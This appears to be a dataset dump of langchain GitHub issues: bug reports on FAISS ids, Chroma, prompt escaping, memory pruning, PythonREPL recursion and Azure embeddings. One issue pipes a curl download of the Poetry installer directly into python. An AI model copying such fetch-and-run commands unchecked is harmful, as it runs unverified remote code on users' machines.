issue_owner_repo
listlengths 2
2
| issue_body
stringlengths 0
261k
⌀ | issue_title
stringlengths 1
925
| issue_comments_url
stringlengths 56
81
| issue_comments_count
int64 0
2.5k
| issue_created_at
stringlengths 20
20
| issue_updated_at
stringlengths 20
20
| issue_html_url
stringlengths 37
62
| issue_github_id
int64 387k
2.46B
| issue_number
int64 1
127k
|
---|---|---|---|---|---|---|---|---|---|
[
"hwchase17",
"langchain"
]
| ### System Info
langchain 0.0.173
faiss-cpu 1.7.4
python 3.10.11
Void linux
### Who can help?
@hwchase17
### Information
- [ ] The official example notebooks/scripts
- [X] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [X] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
It's a logic error in langchain.vectorstores.faiss.__add()
https://github.com/hwchase17/langchain/blob/0c3de0a0b32fadb8caf3e6d803287229409f9da9/langchain/vectorstores/faiss.py#L94-L100
https://github.com/hwchase17/langchain/blob/0c3de0a0b32fadb8caf3e6d803287229409f9da9/langchain/vectorstores/faiss.py#L118-L126
The id is not possible to specify as a function argument. This makes it impossible to detect duplicate additions, for instance.
### Expected behavior
It should be possible to specify id of inserted documents / texts using the add_documents / add_texts methods, as it is in the Chroma object's methods.
As a side-effect this ability would also fix the inability to remove duplicates (see https://github.com/hwchase17/langchain/issues/2699 and https://github.com/hwchase17/langchain/issues/3896 ) by the approach of using ids unique to the content (I use a hash, for example). | FAISS should allow you to specify id when using add_text | https://api.github.com/repos/langchain-ai/langchain/issues/5065/comments | 6 | 2023-05-21T16:39:28Z | 2023-05-25T05:26:48Z | https://github.com/langchain-ai/langchain/issues/5065 | 1,718,564,503 | 5,065 |
[
"hwchase17",
"langchain"
]
| https://github.com/hwchase17/langchain/blob/424a573266c848fe2e53bc2d50c2dc7fc72f2c15/langchain/vectorstores/chroma.py#L275
The line above would only select the candidates based on MMR, and not reorder them based on MMR's ranking.
This is not the case for any other vectorstores that support MMR.
cc @hwchase17
| [Bug] MMR ordering is not preserved for the Chroma Vectorstore | https://api.github.com/repos/langchain-ai/langchain/issues/5061/comments | 3 | 2023-05-21T15:50:19Z | 2023-09-17T17:16:54Z | https://github.com/langchain-ai/langchain/issues/5061 | 1,718,549,470 | 5,061 |
[
"hwchase17",
"langchain"
]
| ### Issue you'd like to raise.
I am using the babyagi with the zeroshotagent the prompt length error is persistent , how can we fix it possibly summarise the agent_scratchpad and if someone could explain how does it work by default ? does It keep appending the bot and human response in it or just the previous ones?
### Suggestion:
_No response_ | Issue: How do I fix the prompt length error in any agent that uses LLMCHAIN ? | https://api.github.com/repos/langchain-ai/langchain/issues/5057/comments | 2 | 2023-05-21T12:42:59Z | 2023-09-10T16:14:20Z | https://github.com/langchain-ai/langchain/issues/5057 | 1,718,490,382 | 5,057 |
[
"hwchase17",
"langchain"
]
| ### Issue you'd like to raise.
By way of example from the official docs,
memory = ConversationTokenBufferMemory(llm=llm, max_token_limit=10)
memory. save_context({"input": "hi"}, {"ouput": "what's up"})
memory. save_context({"input": "not much you"}, {"ouput": "not much"})
memory. load_memory_variables({})
If it is the memory method, when the number of memories exceeds the given token limit, it will trim the memory normally, but if persistent messages are added, the memory will not be trimmed, for example
history = RedisChatMessageHistory(
url=redis_url, ttl=600, session_id='id') memory = ConversationTokenBufferMemory(llm=llm, max_token_limit=10, chat_memory=history)
memory. save_context({"input": "hi"}, {"ouput": "what's up"})
memory. save_context({"input": "not much you"}, {"ouput": "not much"})
memory. load_memory_variables({})
You will find that the limit of the token exceeded in time, or it will print out all the historical memory
This will cause your code to fail to work properly for a certain period of time until the ttl that triggers redis expires
At present, my approach is to redefine a TokenMemory class. The following code is for reference only. If you have a better way to implement it, you are welcome to discuss it
`class CustomTokenMemory(BaseChatMemory):
new_buffer: List = []
human_prefix: str = "Human"
ai_prefix: str = "AI"
llm:BaseLanguageModel
memory_key: str = "history"
max_token_limit: int = 2000
@property
def buffer(self) -> List[BaseMessage]:
"""String buffer of memory."""
if not self. new_buffer:
self. prune_memory()
return self. new_buffer
@property
def memory_variables(self) -> List[str]:
"""Will always return list of memory variables.
:meta private:
"""
return [self. memory_key]
def load_memory_variables(self, inputs: Dict[str, Any]) -> Dict[str, Any]:
"""Return history buffer."""
buffer: Any = self.buffer
if self. return_messages:
final_buffer: Any = buffer
else:
final_buffer = get_buffer_string(
buffer,
human_prefix=self.human_prefix,
ai_prefix=self.ai_prefix,
)
return {self. memory_key: final_buffer}
def save_context(self, inputs: Dict[str, Any], outputs: Dict[str, str]) -> None:
"""Save context from this conversation to buffer. Pruned."""
super(). save_context(inputs, outputs)
self. prune_memory()
def prune_memory(self):
# Prune buffer if it exceeds max token limit
buffer = self.chat_memory.messages
curr_buffer_length = self.llm.get_num_tokens_from_messages(buffer)
if curr_buffer_length > self.max_token_limit:
while curr_buffer_length > self.max_token_limit:
buffer. pop(0)
curr_buffer_length = self.llm.get_num_tokens_from_messages(buffer)
self.new_buffer = buffer`
Here I newly define a new_buffer array to point to the pruned memory, because in ConversationTokenBufferMemory, his self.buffer always gets all the messages in redis, so even if the memory is pruned in save_context, but All the historical messages obtained through load_memory_variables. My change here is that when the new_buffer is empty, the historical messages are first obtained from redis. Here, it needs to be trimmed once to ensure that the obtained messages must be within the Token limit, so The main purpose is to deal with rare scenarios, such as when your service is down or restarted, and the messages in the memory disappear. Although this is not necessary in most cases, then after new messages enter, the buffer will be deleted. new_buffer instead, then the pruned memory is obtained through load_memory_variables
### Suggestion:
_No response_ | The problem that ConversationTokenBufferMemory cannot be trimmed normally due to the use of persistent messages | https://api.github.com/repos/langchain-ai/langchain/issues/5053/comments | 4 | 2023-05-21T10:41:45Z | 2024-05-20T08:01:06Z | https://github.com/langchain-ai/langchain/issues/5053 | 1,718,455,217 | 5,053 |
[
"hwchase17",
"langchain"
]
| ### System Info
I'm working on Q&A using OpenAI for pdf and another documents. Below is the code
```
from langchain.embeddings.openai import OpenAIEmbeddings
from langchain.vectorstores import Chroma
from langchain import OpenAI, VectorDBQA
import pickle
import textwrap
from langchain.text_splitter import RecursiveCharacterTextSplitter
from langchain.llms import OpenAI
from langchain.chains import RetrievalQA
from langchain.document_loaders import PyPDFLoader, DirectoryLoader
import os
import warnings
warnings.filterwarnings("ignore")
# Set up the environment variable for the OpenAI API key
os.environ["OPENAI_API_KEY"] = ""
def get_documents(folder_path, file_extension):
documents = []
if file_extension == 'pdf':
pdf_loader = DirectoryLoader(folder_path, glob="./*.pdf", loader_cls=PyPDFLoader) # Select PDF files
documents += pdf_loader.load()
elif file_extension == 'txt':
txt_loader = DirectoryLoader(folder_path, glob="./*.txt") # Select TXT files
documents += txt_loader.load()
elif file_extension == 'combined':
pdf_loader = DirectoryLoader(folder_path, glob="./*.pdf", loader_cls=PyPDFLoader) # Select PDF files
documents += pdf_loader.load()
txt_loader = DirectoryLoader(folder_path, glob="./*.txt") # Select TXT files
documents += txt_loader.load()
else:
return None
return documents
def get_query_result(query, documents):
# Split documents
text_splitter = RecursiveCharacterTextSplitter(chunk_size=2000, chunk_overlap=200)
texts = text_splitter.split_documents(documents)
# Query documents
embeddings = OpenAIEmbeddings(openai_api_key=os.environ['OPENAI_API_KEY'])
docsearch = Chroma.from_documents(texts, embeddings)
qa = VectorDBQA.from_chain_type(llm=OpenAI(), chain_type="stuff", vectorstore=docsearch, return_source_documents=True)
result = qa({"query": query})
result_text = result['result'].strip()
source = result.get('source_documents', [{}])[0].metadata.get('source', '')
page = result.get('source_documents', [{}])[0].metadata.get('page', '')
return result_text, source, page
def chat_loop(file_extension, folder_path):
documents = get_documents(folder_path, file_extension)
if documents is None:
print("Invalid folder path or no supported files found.")
return
while True:
query = input("Enter your query (type 'exit' to end): ")
if query.lower() == 'exit':
break
result = get_query_result(query, documents)
if result is not None:
result_text, source, page = result
print("Result:", result_text)
if source:
print("Source:", source)
print("Page:", page)
else:
print("No answer found for the query.")
print() # Print an empty line for separation
# Get the selected file extension and folder path from the webpage
selected_file_extension = 'combined'
folder_path = 'Documents'
# Start the chat loop
chat_loop(selected_file_extension, folder_path)
```
The code above will just take the input pdf or any other document text and provide a single line answer. In ChatGPT, if we provide it a long text or paragraph and ask it a question, it will give us the answer and explain where it got the answer and why it is correct. Is it possible to perform the same in the above code?
### Who can help?
_No response_
### Information
- [ ] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [X] LLMs/Chat Models
- [X] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
Looking for a better explanation of answer instead of returning a single line answer or just answer.
### Expected behavior
Expecting to return the answers with better explanation or articulation. | Regarding explaination of answer which is returned by OpenAI embeddings | https://api.github.com/repos/langchain-ai/langchain/issues/5052/comments | 1 | 2023-05-21T10:11:49Z | 2023-09-10T16:14:25Z | https://github.com/langchain-ai/langchain/issues/5052 | 1,718,447,024 | 5,052 |
[
"hwchase17",
"langchain"
]
| ### Issue you'd like to raise.
Hey,
I am willing to use { and } chars as an example in my prompt template (I want to prompt my chain to generate css code), but this generates this error:
```
Traceback (most recent call last):
File "/Users/thomas/workspace/j4rvis/j4rvis/tools/document_tools.py", line 43, in <module>
prompt=PromptTemplate(
^^^^^^^^^^^^^^^
File "pydantic/main.py", line 341, in pydantic.main.BaseModel.__init__
pydantic.error_wrappers.ValidationError: 1 validation error for PromptTemplate
__root__
Invalid prompt schema; check for mismatched or missing input parameters. ' ' (type=value_error)
```
How could I escape those chars so they don't get interpreted as input_variables?
### Suggestion:
_No response_ | Issue: Escaping { and } chars in a langchain.prompts.PromptTemplate | https://api.github.com/repos/langchain-ai/langchain/issues/5051/comments | 4 | 2023-05-21T09:25:49Z | 2023-09-22T16:08:39Z | https://github.com/langchain-ai/langchain/issues/5051 | 1,718,432,064 | 5,051 |
[
"hwchase17",
"langchain"
]
| ### System Info
MacOS Ventura, zshell
`pyenv virtualenv 3.11 langchain`, clean environment
`pyenv local langchain`, automatically activate environment
`curl -sSL https://install.python-poetry.org | python -`, install poetry
`export PATH="/Users/steven/.local/bin:$PATH`, added this to allow for poetry to be accessible
`pip install --upgrade pip`
`pip install torch`
`poetry install -E all`
yields the following output. Strange.
```bash
• Installing torch (1.13.1): Failed
RuntimeError
Unable to find installation candidates for torch (1.13.1)
at ~/Library/Application Support/pypoetry/venv/lib/python3.11/site-packages/poetry/installation/chooser.py:76 in choose_for
72│
73│ links.append(link)
74│
75│ if not links:
→ 76│ raise RuntimeError(f"Unable to find installation candidates for {package}")
77│
78│ # Get the best link
79│ chosen = max(links, key=lambda link: self._sort_key(package, link))
80│
```
### Who can help?
@hwchase17 This is install related and while I have langchain running fine from pip in another virtual environment running the same python version (3.11.3), things with poetry are not working well.
### Information
- [ ] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
MacOS Ventura, zshell
`pyenv virtualenv 3.11 langchain`, clean environment
`pyenv local langchain`, automatically activate environment
`curl -sSL https://install.python-poetry.org | python -`, install poetry
`export PATH="/Users/steven/.local/bin:$PATH`, added this to allow for poetry to be accessible
`pip install --upgrade pip`
`pip install torch`
`poetry install -E all`
### Expected behavior
```bash
• Installing torch (1.13.1): Failed
RuntimeError
Unable to find installation candidates for torch (1.13.1)
at ~/Library/Application Support/pypoetry/venv/lib/python3.11/site-packages/poetry/installation/chooser.py:76 in choose_for
72│
73│ links.append(link)
74│
75│ if not links:
→ 76│ raise RuntimeError(f"Unable to find installation candidates for {package}")
77│
78│ # Get the best link
79│ chosen = max(links, key=lambda link: self._sort_key(package, link))
80│
``` | poetry install -E all` fails because `torch` undetected | https://api.github.com/repos/langchain-ai/langchain/issues/5048/comments | 10 | 2023-05-21T05:19:15Z | 2024-02-13T16:16:32Z | https://github.com/langchain-ai/langchain/issues/5048 | 1,718,375,450 | 5,048 |
[
"hwchase17",
"langchain"
]
| ### Issue you'd like to raise.
Hi,
for the following code there is a dimension error -> InvalidDimensionException: Dimensionality of (1536) does not match index dimensionality (384)
```embeddingsFunction = OpenAIEmbeddings(model="text-embedding-ada-002", chunk_size=1)
persist_directory = "chromaDB_csv"
vectordb = None
vectordb = Chroma.from_documents(
documents=docs, embeddings=embeddingsFunction, persist_directory=persist_directory
)
vectordb.persist()
AzureOpenAI.api_type = "azure"
llm = AzureChatOpenAI(
deployment_name="gpt-35-turbo",
engine="gpt-35-turbo",
openai_api_base=os.getenv('OPENAI_API_BASE'),
openai_api_key=os.getenv("OPENAI_API_KEY"),
openai_api_type = "azure",
openai_api_version = "2023-03-15-preview"
)
print(os.getenv('OPENAI_API_BASE'))
print(os.getenv('OPENAI_API_KEY'))
vectordb = Chroma(persist_directory=persist_directory, embedding_function=embeddingsFunction )
search_kwargs = {
"maximal_marginal_relevance": True,
"distance_metric": "cos",
"fetch_k": 100,
"k": 10,
}
retriever = vectordb.as_retriever(search_type="mmr", search_kwargs=search_kwargs)
chain = ConversationalRetrievalChain.from_llm(
llm,
retriever=retriever,
chain_type="stuff",
verbose=True,
max_tokens_limit=4096,
)
chain({"question": "ABC ABC ABC ABC", "chat_history":[]})```
### Suggestion:
_No response_ | Issue: Chroma DB | https://api.github.com/repos/langchain-ai/langchain/issues/5046/comments | 20 | 2023-05-20T20:35:07Z | 2024-07-29T09:33:13Z | https://github.com/langchain-ai/langchain/issues/5046 | 1,718,283,195 | 5,046 |
[
"hwchase17",
"langchain"
]
| ### Issue you'd like to raise.
Hi All,
I'm developing a chatbot that run over PDF documents that stored on Pinecone.
I have an agent that use one tool (in my case it's `ConversationalRetrievalChain`) the chain works perfect when I'm asking any question.
But when I move forward and pass this chain as a tool I'm getting unexpected results.
For example when I asked "Who is Leo Messi?" (of course I don't have any info on him in my PDF file), I got real answer to the question "Leo Messi is Argentinian soccer player......"
I noticed that the agent search by himself answer to that question and don't run the tool I provided for him.
I have tried to edit the prompt of the agent that will not search data by himself, but without success.
Anyone face it too?
Thanks for help!
### Suggestion:
_No response_ | Agent answer questions that is not related to my custom data | https://api.github.com/repos/langchain-ai/langchain/issues/5044/comments | 6 | 2023-05-20T19:42:03Z | 2023-09-11T08:17:08Z | https://github.com/langchain-ai/langchain/issues/5044 | 1,718,266,994 | 5,044 |
[
"hwchase17",
"langchain"
]
| ### System Info
"langchain": "^0.0.75"
"@supabase/supabase-js": "^2.21.0"
### Who can help?
@hwchase17
### Information
- [x] The official example notebooks/scripts
- [X] My own modified scripts
### Related Components
- [X] LLMs/Chat Models
- [ ] Embedding Models
- [X] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [X] Vector Stores / Retrievers
- [X] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [X] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
```
export const query = async (query) => {
const model = new ChatOpenAI({
modelName: 'gpt-3.5-turbo',
});
const vectorStore = await SupabaseVectorStore.fromExistingIndex(
new OpenAIEmbeddings(),
{
client: SUPABASE_CLIENT,
tableName: 'documents',
queryName: 'match_documents_with_filters',
filter: { email: '[email protected]' }, //able to filter name with this as store in db.
}
);
const memory = new VectorStoreRetrieverMemory({
vectorStoreRetriever: vectorStore.asRetriever(5),
memoryKey: 'history',
});
await memory.saveContext(
{ input: 'My favorite sport is soccer' },
{ output: '...' }
);// this is not working when using metadata filtering.
const prompt =
PromptTemplate.fromTemplate(`The following is a friendly conversation between a human and an AI. The AI is talkative and provides lots of specific details from its context. If the AI does not know the answer to a question, it truthfully says it does not know.
Relevant pieces of conversation:
{history}
(You do not need to use these pieces of information if not relevant to your question)
Current conversation:
Human: {input}
AI:`);
const chain = new LLMChain({ llm: model, prompt: prompt, memory: memory });
const res2 = await chain.call({ input: query });
console.log({ res2 });
return res2;
};
query('what is my name? and what is my favorite sport?');
```
### Expected behavior
The name in the db is stored as abc.
I am able to get it by using the filter, but the favorite sport is missing in the answer.
output: "Your name is abc. As for your favorite sport, I don't have that information. Would you like me to look it up for you?"
expected output: "Your name is abc and your favorite sport is soccer."
able to get favorite sport as soccer if I don't use filtering but then the name is missing. | not able to use memory.saveContent and metadata filtering together. | https://api.github.com/repos/langchain-ai/langchain/issues/5043/comments | 2 | 2023-05-20T19:14:01Z | 2023-05-30T18:17:46Z | https://github.com/langchain-ai/langchain/issues/5043 | 1,718,260,661 | 5,043 |
[
"hwchase17",
"langchain"
]
| ### System Info
I have tried to run the AzureOpenAI example here for embedding: https://python.langchain.com/en/latest/modules/models/text_embedding/examples/azureopenai.html
Doing so, I get the following error:
`InvalidRequestError: Must provide an 'engine' or 'deployment_id' parameter to create a <class 'openai.api_resources.embedding.Embedding'>`
I am using the current versions:
```
openai==0.27.7
langchain==0.0.174
```
I have even followed the issue described in #1560 to no avail
### Who can help?
_No response_
### Information
- [ ] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [X] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
https://python.langchain.com/en/latest/modules/models/text_embedding/examples/azureopenai.html
### Expected behavior
No errors | AzureOpenAI example error (embeddding) | https://api.github.com/repos/langchain-ai/langchain/issues/5042/comments | 2 | 2023-05-20T18:11:22Z | 2023-05-20T20:27:10Z | https://github.com/langchain-ai/langchain/issues/5042 | 1,718,245,431 | 5,042 |
[
"hwchase17",
"langchain"
]
| ### Issue you'd like to raise.
I am trying to access dolly-v2-3b using Langchain and HuggingFaceHub using the tutorial provided on the [website](https://python.langchain.com/en/latest/modules/models/llms/integrations/huggingface_hub.html).
However I am facing a few issues.
1. The instruction to `!pip install huggingface_hub > /dev/null` does not work. The error output is: The system cannot find the path specified.
2. Second, when using the example code to access dolly-v2-3b from Hugging Face Hub, the following code only provides a single word as output.
The code is shown below:
from langchain import HuggingFaceHub
repo_id = "databricks/dolly-v2-3b"
llm = HuggingFaceHub(repo_id=repo_id, model_kwargs={"temperature":0, "max_length":64})
I have also tried changing the max_length and temperature, but this makes no difference.
### Suggestion:
_No response_ | Issue: Accessing Dolly-v2-3b via HuggingFaceHub and langchain | https://api.github.com/repos/langchain-ai/langchain/issues/5040/comments | 2 | 2023-05-20T16:05:33Z | 2023-09-15T16:12:11Z | https://github.com/langchain-ai/langchain/issues/5040 | 1,718,214,309 | 5,040 |
[
"hwchase17",
"langchain"
]
| ### Issue with current documentation:
Within the documentation, in the last sentence change should be **charge**.
Reference link: https://python.langchain.com/en/latest/modules/agents.html
<img width="511" alt="image" src="https://github.com/hwchase17/langchain/assets/67931050/52f6eacd-7930-451f-abd7-05eca9479390">
### Idea or request for content:
I propose correcting the misspelling as in change does not make sense and that the Action Agent is supposed to be in charge of the execution. | DOC: Misspelling in agents.rst | https://api.github.com/repos/langchain-ai/langchain/issues/5039/comments | 0 | 2023-05-20T15:50:20Z | 2023-06-01T01:06:04Z | https://github.com/langchain-ai/langchain/issues/5039 | 1,718,210,139 | 5,039 |
[
"hwchase17",
"langchain"
]
| ### System Info
MacOS, Python 3.11.2, langchain 0.0.174
### Who can help?
@vowelparrot
### Information
- [X] My own modified scripts
### Related Components
- [X] Tools / Toolkits
### Reproduction
I hit a strange error when using PythonREPL in an agent. It happens with this **recursive** Python function. It was written by gpt-3.5-turbo and is valid Python:
```python
def fibonacci(n):
if n <= 1:
return n
else:
return fibonacci(n-1) + fibonacci(n-2) # <-- this line will trigger the NameError
print(fibonacci(10))
```
Note that everything works as expected for non-recursive functions.
Using this function as string input, I reduced the issue to this minimal example:
```python
from langchain.utilities import PythonREPL
python_repl = PythonREPL()
cmd = "def fibonacci(n):\n if n <= 1:\n return n\n else:\n return fibonacci(n-1) + fibonacci(n-2)\nprint(fibonacci(10))"
python_repl.run(cmd)
```
> $ python t.py
> NameError("name 'fibonacci' is not defined")
When executed with `exec(cmd)`, it runs as expected. I found that `PythonREPL` runs the command with `exec(command, self.globals, self.locals)`.
Setting globals & locals in this `python_repl` instance makes the fragment work as expected:
```python
# [... as before ...]
python_repl.globals = globals()
python_repl.locals = locals()
python_repl.run(cmd)
```
This hack solves it only in the context of this simple example, but not if `python_repl` added as a tool to an `AgentExecutor`.
At the core, the issue seems to be caused by Python scopes, but my knowledge of this is not profound enough to fully understand what's happening.
### Expected behavior
I would have expected `PythonREPL` to accept recursive functions. | Reproducible NameError with recursive function in PythonREPL() | https://api.github.com/repos/langchain-ai/langchain/issues/5035/comments | 2 | 2023-05-20T14:08:20Z | 2024-06-07T08:08:18Z | https://github.com/langchain-ai/langchain/issues/5035 | 1,718,183,052 | 5,035 |
[
"hwchase17",
"langchain"
]
| ### Feature request
Have we considered the ability for an agent to spawn and manage other agents? It would be nice to be able to continue chatting with the main agent while other agents execute queries in the background.
Is this possible today? If so, what class should be used? If not, have we thought about how we might do it?
### Motivation
The ability for an agent to spawn and manage other agents.
### Your contribution
I've got some ideas on how we might manage this using asyncio and an event loop but don't want to jump the gun if we've already discussed it. | Spawning and managing agents | https://api.github.com/repos/langchain-ai/langchain/issues/5033/comments | 3 | 2023-05-20T12:50:55Z | 2023-09-10T16:14:41Z | https://github.com/langchain-ai/langchain/issues/5033 | 1,718,162,981 | 5,033 |
[
"hwchase17",
"langchain"
]
| ### Feature request
We want to request the addition of OAuth 2.0 support to the langchain package. OAuth 2.0 is a widely adopted industry-standard protocol for authorization. It would be immensely beneficial if langchain could incorporate this feature into its framework.
### Motivation
Our organization and many others are looking to use langchain for various internal projects. OAuth 2.0 support would significantly streamline integrating these projects with other systems in our ecosystem, which already use OAuth 2.0 for secure authorization.
Furthermore, langchain, a leading framework for large language model development, would significantly increase its appeal and utility by supporting OAuth 2.0. It would allow for more secure and efficient development, paramount in today's data-centric world.
This feature would not only benefit our organization but would also be advantageous for the wider langchain community. Furthermore, the addition of OAuth 2.0 support could potentially expand the usage and applicability of the langchain package across various domains and organizations.
### Your contribution
I can provide feedback on industry needs. | OAuth 2.0 Support | https://api.github.com/repos/langchain-ai/langchain/issues/5032/comments | 3 | 2023-05-20T12:19:52Z | 2023-09-19T16:09:50Z | https://github.com/langchain-ai/langchain/issues/5032 | 1,718,155,380 | 5,032 |
[
"hwchase17",
"langchain"
]
| ### System Info
aiohttp==3.8.4
aiosignal==1.3.1
aniso8601==9.0.1
anyio==3.6.2
async-timeout==4.0.2
attrs==23.1.0
backoff==2.2.1
blinker==1.6.2
certifi==2023.5.7
charset-normalizer==3.1.0
chromadb==0.3.23
click==8.1.3
clickhouse-connect==0.5.24
colorama==0.4.6
dataclasses-json==0.5.7
duckdb==0.8.0
environs==9.5.0
fastapi==0.95.2
filelock==3.12.0
Flask==2.3.2
Flask-RESTful==0.3.9
frozenlist==1.3.3
fsspec==2023.5.0
greenlet==2.0.2
grpcio==1.53.0
h11==0.14.0
hnswlib==0.7.0
httptools==0.5.0
huggingface-hub==0.14.1
idna==3.4
itsdangerous==2.1.2
Jinja2==3.1.2
joblib==1.2.0
langchain==0.0.174
lz4==4.3.2
MarkupSafe==2.1.2
marshmallow==3.19.0
marshmallow-enum==1.5.1
monotonic==1.6
mpmath==1.3.0
multidict==6.0.4
mypy-extensions==1.0.0
networkx==3.1
nltk==3.8.1
numexpr==2.8.4
numpy==1.24.3
openai==0.27.6
openapi-schema-pydantic==1.2.4
packaging==23.1
pandas==2.0.1
Pillow==9.5.0
posthog==3.0.1
protobuf==4.23.1
pydantic==1.10.7
pymilvus==2.2.8
python-dateutil==2.8.2
python-dotenv==1.0.0
pytz==2023.3
PyYAML==6.0
regex==2023.5.5
requests==2.30.0
scikit-learn==1.2.2
scipy==1.10.1
sentence-transformers==2.2.2
sentencepiece==0.1.99
six==1.16.0
sniffio==1.3.0
SQLAlchemy==2.0.13
starlette==0.27.0
sympy==1.12
tenacity==8.2.2
threadpoolctl==3.1.0
tiktoken==0.4.0
tokenizers==0.13.3
torch==2.0.1
torchvision==0.15.2
tqdm==4.65.0
transformers==4.29.2
typing-inspect==0.8.0
typing_extensions==4.5.0
tzdata==2023.3
ujson==5.7.0
urllib3==2.0.2
uvicorn==0.22.0
watchfiles==0.19.0
websockets==11.0.3
Werkzeug==2.3.4
yarl==1.9.2
zstandard==0.21.0
### Who can help?
_No response_
### Information
- [ ] The official example notebooks/scripts
- [X] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [X] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
Reproduction Steps:
1. Create an instance of the Collection class.
2. Initialize the LangChain object and make sure it is properly configured.
3. Create a Document object and set its page_content and metadata attributes appropriately.
4. Call the update_document method on the LangChain object, passing the document_id and document as arguments.
Expected Result:
The update_document method should update the specified document in the collection with the provided text and metadata.
Actual Result:
An AttributeError is raised with the following traceback:
```plain
File "E:\AI Projects\flask-backend\venv\lib\site-packages\langchain\vectorstores\chroma.py", line 351, in update_document
self._collection.update_document(document_id, text, metadata)
AttributeError: 'Collection' object has no attribute 'update_document'
```
Note that the error occurs in the chroma.py file, specifically in the update_document method of the Collection class.
### Expected behavior
The update_document method should update the specified document in the collection with the provided text and metadata.
| AttributeError: 'Collection' object has no attribute 'update_document' | https://api.github.com/repos/langchain-ai/langchain/issues/5031/comments | 4 | 2023-05-20T12:01:57Z | 2023-09-15T22:13:00Z | https://github.com/langchain-ai/langchain/issues/5031 | 1,718,150,791 | 5,031 |
[
"hwchase17",
"langchain"
]
| ### Issue you'd like to raise.
INFO: Will watch for changes in these directories: ['/Users/abdibrokhim/VisualStudioCode/draft/antrophicCloudeLangchainTutorialApp']
INFO: Uvicorn running on http://127.0.0.1:8000 (Press CTRL+C to quit)
INFO: Started reloader process [58140] using WatchFiles
Process SpawnProcess-1:
Traceback (most recent call last):
File "/Library/Frameworks/Python.framework/Versions/3.10/lib/python3.10/multiprocessing/process.py", line 315, in _bootstrap
self.run()
File "/Library/Frameworks/Python.framework/Versions/3.10/lib/python3.10/multiprocessing/process.py", line 108, in run
self._target(*self._args, **self._kwargs)
File "/Library/Frameworks/Python.framework/Versions/3.10/lib/python3.10/site-packages/uvicorn/_subprocess.py", line 76, in subprocess_started
target(sockets=sockets)
File "/Library/Frameworks/Python.framework/Versions/3.10/lib/python3.10/site-packages/uvicorn/server.py", line 60, in run
return asyncio.run(self.serve(sockets=sockets))
File "/Library/Frameworks/Python.framework/Versions/3.10/lib/python3.10/asyncio/runners.py", line 44, in run
return loop.run_until_complete(main)
File "uvloop/loop.pyx", line 1517, in uvloop.loop.Loop.run_until_complete
File "/Library/Frameworks/Python.framework/Versions/3.10/lib/python3.10/site-packages/uvicorn/server.py", line 67, in serve
config.load()
File "/Library/Frameworks/Python.framework/Versions/3.10/lib/python3.10/site-packages/uvicorn/config.py", line 477, in load
self.loaded_app = import_from_string(self.app)
File "/Library/Frameworks/Python.framework/Versions/3.10/lib/python3.10/site-packages/uvicorn/importer.py", line 24, in import_from_string
raise exc from None
File "/Library/Frameworks/Python.framework/Versions/3.10/lib/python3.10/site-packages/uvicorn/importer.py", line 21, in import_from_string
module = importlib.import_module(module_str)
File "/Library/Frameworks/Python.framework/Versions/3.10/lib/python3.10/importlib/__init__.py", line 126, in import_module
return _bootstrap._gcd_import(name[level:], package, level)
File "<frozen importlib._bootstrap>", line 1050, in _gcd_import
File "<frozen importlib._bootstrap>", line 1027, in _find_and_load
File "<frozen importlib._bootstrap>", line 1006, in _find_and_load_unlocked
File "<frozen importlib._bootstrap>", line 688, in _load_unlocked
File "<frozen importlib._bootstrap_external>", line 883, in exec_module
File "<frozen importlib._bootstrap>", line 241, in _call_with_frames_removed
File "/Users/abdibrokhim/VisualStudioCode/draft/antrophicCloudeLangchainTutorialApp/./main.py", line 6, in <module>
from langchain import PromptTemplate, LLMChain
ModuleNotFoundError: No module named 'langchain'
### Suggestion:
_No response_ | Help me please, even i installed langchain library it says "No module named 'langchain'" why? | https://api.github.com/repos/langchain-ai/langchain/issues/5028/comments | 3 | 2023-05-20T10:55:13Z | 2023-05-20T19:24:56Z | https://github.com/langchain-ai/langchain/issues/5028 | 1,718,135,190 | 5,028 |
[
"hwchase17",
"langchain"
]
| ### System Info
LangChain version = 0.0.167
Python version = 3.11.0
System = Windows 11 (using Jupyter)
### Who can help?
- @hwchase17
- @agola11
- @UmerHA (I have a fix ready, will submit a PR)
### Information
- [ ] The official example notebooks/scripts
- [X] My own modified scripts
### Related Components
- [X] LLMs/Chat Models
- [ ] Embedding Models
- [X] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
